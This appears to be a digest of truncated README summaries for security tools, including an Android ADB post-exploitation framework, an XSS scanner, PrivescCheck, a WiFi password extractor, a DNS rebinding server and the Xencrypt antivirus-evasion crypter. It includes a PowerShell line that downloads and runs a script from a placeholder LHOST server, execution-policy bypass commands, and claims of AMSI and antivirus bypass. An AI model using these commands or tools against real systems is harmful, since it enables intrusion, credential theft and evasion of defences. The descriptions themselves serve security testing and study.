Ghost Framework is an [Android](<https://www.kitploit.com/search/label/Android> "Android" ) post [exploitation framework](<https://www.kitploit.com/search/label/Exploitation%20Framework> "exploitation framework" ) that uses the Android Debug Bridge (ADB) to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.

Getting started

Ghost installation:

```shell
cd ghost
chmod +x install.sh
./install.sh
```

Ghost uninstallation:

```shell
cd ghost
chmod +x uninstall.sh
./uninstall.sh
```

Ghost Framework execution. To execute Ghost Framework, run the following command:

```shell
ghost
```

Why Ghost Framework

- Accessing the device shell. Ghost Framework can be used to access the remote Android device shell without using OpenSSH or other protocols.
- Emulating device button presses. Ghost Framework can be used to emulate button presses on the remote Android device.
- Removing the device password. Ghost Framework can be used to remove the remote Android device password if it was forgotten.

Ghost Framework disclaimer: Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Download…

This is the extended version based on the initial idea already published as "xssfinder". This private version allows an attacker to perform not only GET but also POST requests. Additionally, it is possible to proxy every request through Burp or another tunnel.

First steps: Rename `example.app-settings.conf` to `app-settings.conf` and adjust the settings. It should work out of the box, but depending on the target I would recommend resizing the chunk sizes.

Execution: This tool does not expect any arguments via the CLI, so just type:

```shell
python3 extended-xss-search.py
```

Configuration: It is possible to set a lot of options and settings, so here are some explanations.

Files: The main config file is `app-settings.conf`; everything has to be done in that file! Besides that, there are some other files which allow you to set more complex data like headers, URLs and cookies.

- `config/cookie-jar.txt`: Use this file to add a cookie string. I usually copy the one which you can see in every Burp request. Please copy just the value of the `Cookie:` header. A sample input is in the default file.
- `config/http-headers.txt`: This file defines the HTTP headers which are added to the request and manipulated (the payload is added to each one). The most important ones are already in the file, but feel free to add more.
- `config/parameters.txt`: The tool has the option to brute-force GET and POST parameters. In that case those parameters (plus those in the query string) will be used….

Phonia Toolkit is one of the most advanced toolkits to scan [phone numbers](<https://www.kitploit.com/search/label/Phone%20Number> "phone number" ) using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone number with very good accuracy.

Getting started

Phonia installation:

```shell
cd phonia
chmod +x install.sh
./install.sh
```

Phonia uninstallation:

```shell
cd phonia
chmod +x uninstall.sh
./uninstall.sh
```

Phonia Toolkit execution:

```
phonia -h
usage: phonia [-h] [-p <phone>] [-i <inputfile>] [-o <outputfile>] [-s <scanner>] [--recon] [--no-ansi] [-u]

optional arguments:
  -h, --help            show this help message and exit
  -p <phone>, --phone <phone>
                        The phone number to scan.
  -i <inputfile>, --input <inputfile>
                        List of phone numbers to scan.
  -o <outputfile>, --output <outputfile>
                        Output to save scan results.
  -s <scanner>, --scanner <scanner>
                        The scanner to use.
  --recon               Launch custom format reconnaissance.
  --no-ansi             Disable colored output.
  -u, --update          Update Phonia Toolkit.
```

Phonia Toolkit examples

Example of the Phonia basic scan:

```shell
phonia -p 15554443333
```

Example of scanning from a file:

```shell
phonia -i input.txt -o output.txt
```

Example of…

This script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation. I built on the amazing work done by @harmj0y and @mattifestation in PowerUp. I added more checks and also tried to reduce the amount of false positives. It's still a work in progress because there are a few more checks I want to implement, but it's already quite complete. If you have any suggestions (improvements, features), feel free to contact me on Twitter @itm4n.

Usage

Use the script from a PowerShell prompt:

```powershell
PS C:\Temp> Set-ExecutionPolicy Bypass -Scope Process -Force
PS C:\Temp> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck
```

Display output and write to a log file at the same time:

```powershell
PS C:\Temp> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object "C:\Temp\result.txt"
```

Use the script from a CMD prompt:

```
C:\Temp>powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck"
```

Import the script from a web server:

```
C:\Temp>powershell "IEX (New-Object Net.WebClient).DownloadString('http://LHOST:LPORT/Invoke-PrivescCheck.ps1'); Invoke-PrivescCheck"
```

Yet another Windows privilege escalation tool, why? I really like PowerUp because it can enumerate common vulnerabilities very quickly and without using any third-party tools. The problem is that it hasn't been updated for several years now. The…

Monitor the Twitter stream. TwitWork uses the Twitter stream, which lets you receive tweets in real time. There is an input that allows you to filter the flow on one (or more) keywords or on an @ handle, based on Twitter tracking.

Demo: This is a demo of exported data on the keyword "Coronavirius": https://twitwork.github.io/

Requires: NodeJs, Npm, a Twitter API key

Installation:

```shell
git clone https://github.com/atmoner/TwitWork.git
cd TwitWork
npm install
```

Run it:

```shell
npm start
```

Development setup: For the improvement of the software, do not hesitate to make your proposal in the support section.

To Do:
- Main menu: Add/save file, Edit API key, Setting
- Core: Hashtag extract, Add node/edge for hashtag

Meta: atmon3r – @atmon3r – [email protected] Download…

All-in-one tools for Information Gathering.

Read Me: Initially, you need to create a project where you will save everything. All of the collected information is saved as "project-name" in the results directory. You can update user agent and proxy information in the settings section, and also update the URL, proxy, project name, wordlist and number of threads.

Features: This tool includes: Dork Finder, Admin Panel Finder, Cms Finder, Ip History, Reverse Ip, Page Viewer, Proxy Finder

Installation (with requirements.txt):

```shell
git clone https://github.com/capture0x/XCTR-Hacking-Tools/
cd xctr-hacking-tools
pip3 install -r requirements.txt
```

Usage:

```shell
python3 xctr.py
```

All results are saved in results/project-name.

- Dork Finder: The dork finder has 2 sections: Bing and Yandex. e.g. `*.php?id=`
- Admin Panel Finder: In this section, you first need to choose a wordlist for scanning. Press 2 to change the wordlist and login. The URL should be https://targetsite.com/ (http or https, with a / symbol at the end of the URL). If scanning is slow, update the proxies (press 3 to update).
- Cms Finder: You'll find the CMS version from the meta name.
- Ip History: This tool displays and saves the IP history of the domain. e.g. usage: targetsite.com
- Reverse Ip: With this tool, you can find domains on a server. e.g. usage: 212.57.147.54
- Page Viewer: You can increase the number of page…

WiFi Passview is an open source batch-script-based program that can recover your WiFi password easily in seconds. This is for Windows OS only. Basically, this scripted program has the same function as other passview programs such as WebPassView and MailPassView.

_Disclaimer: WiFi Passview is NOT designed for malicious use! Please use this program responsibly!_

ZSecurity.org: This project is posted on a cyber security educational website called zsecurity.org; you should visit this project there for more information: https://zsecurity.org

How it works: Basically, this is the shortcut and batch-scripted file version of a popular WiFi password viewing method using the command prompt. This is how it works…

```
netsh wlan show profiles
```

When you use this tool, you are able to extract the [WLAN](<https://www.kitploit.com/search/label/WLAN> "wlan" ) passwords stored on the target machine in just seconds.

Features: This simple tool offers you the following features…

- Extract all available WiFi passwords stored in the target machine, in just seconds.
- Extract the password for a specific target SSID.
- Save extracted passwords.
- Additional options.
- No manual reading of Key Content; the tool will do that for you!
- Standalone batch program.
- Customizable.

Usage: Download the repository, look for the "wifi-passview-vX.X.X.bat" file, open it and run it as administrator. All you have to do is to follow the on-screen…

DNS Rebinding framework containing:

- a DNS server, obviously
- a web API to create new subdomains and control the DNS server, view logs, stuff like that
- a shitty React app to make it even more comfy

What does it do? It lets you create DNS bins like a Burp Collaborator, but it adds a bit more features… (at least it tries to). You can specify what IPs it should resolve to and how many times; for now it _only supports A records_ 🙁. Then you can see in the logs where it was requested from, what it resolved to,…

How to run it: First of all, check the configuration in the .py files; it's usually marked by `""" *** CONFIG *** """`. You also should not forget to change the docker and redis passwords in docker-compose.yml, app.py and dns_resources.

Set up postgres and redis:

```shell
sudo docker-compose up
```

Then in ./BE:

```shell
pip3 install -r requirements.txt
python3 dns.py   # to start the dns server
# for testing purposes the development server is enough, I think
FLASK_APP=app.py FLASK_ENV=development flask run
```

Then in ./FE:

```shell
npm install
npm start
```

API documentation: For the API to work you will need to be signed in – the API uses bearer tokens for authentication, and Content-Type has to be set to application/json.

Registration: POST /auth/signup

_JSON body:_

```json
{ "username": "marek", "password": "ffffffff" }
```

_Response:_ { "name": "marek", "access_token":…

BadBlood by Secframe fills a Microsoft Active Directory domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is run on a domain, security analysts and engineers can practice using tools to gain an understanding of, and prescribe approaches to, securing Active Directory. Each time this tool runs, it produces different results. The domain, users, groups, computers and permissions are different. Every. Single. Time.

Full User Guide and Info

Commands: NONE. At this time all items of the script are configured in the .ps1 files. Files are outlined in the User Guide on Secframe.com.

Acknowledgments: I'd like to send thanks to the countless people who wanted this as a product and waited while I made it!

Installation requirements:

- Domain Admin and Schema Admin permissions
- Active Directory PowerShell installed

Running on Windows: clone the repo and run Invoke-badblood.ps1.

```powershell
git clone https://github.com/davidprowe/badblood.git
./badblood/invoke-badblood.ps1
```

Talk about BadBlood: Message or follow me on Twitter @davidprowe, or drop a note on secframe.com. I am not responsible for cleanup if this is run in a production domain.

Disclaimer: Please note: all tools/scripts in this repo are released for use "AS IS" without any warranties of any kind, including, but not limited to their installation, use, or performance. We disclaim any and all…

Tired of wasting lots of time obfuscating PowerShell scripts like invoke-mimikatz only to have them get detected anyway? Wouldn't it be awesome if you could take any script and automatically, with almost no effort, generate a near-infinite amount of variants in order to defeat signature-based antivirus detection mechanisms? WELL, NOW YOU CAN! For the low low price of free!

Xencrypt is a PowerShell crypter that uses AES encryption and Gzip/DEFLATE compression to generate, with every invocation, a completely unique yet functionally equivalent output script given any input script. It does this by compressing and encrypting the input script and storing this data as a payload in a new script which will decrypt and decompress the payload before running it. In essence, it is to PowerShell what a PE crypter is.

In action

Features

Xencrypt:

- Bypasses AMSI and all modern AVs in use on VirusTotal (as of writing)
- Compresses and encrypts PowerShell scripts
- Has a minimal and often even negative (thanks to the compression) overhead
- Randomizes variable names to further obfuscate the decrypter stub
- Randomizes encryption, compression and even the order that the statements appear in the code for maximum entropy!
- Super easy to modify to create your own crypter variant
- Supports recursive layering (crypter crypting the crypted output), tested up to 500 layers.
- Supports Import-Module as well as standard running as long as the input script also supported it …
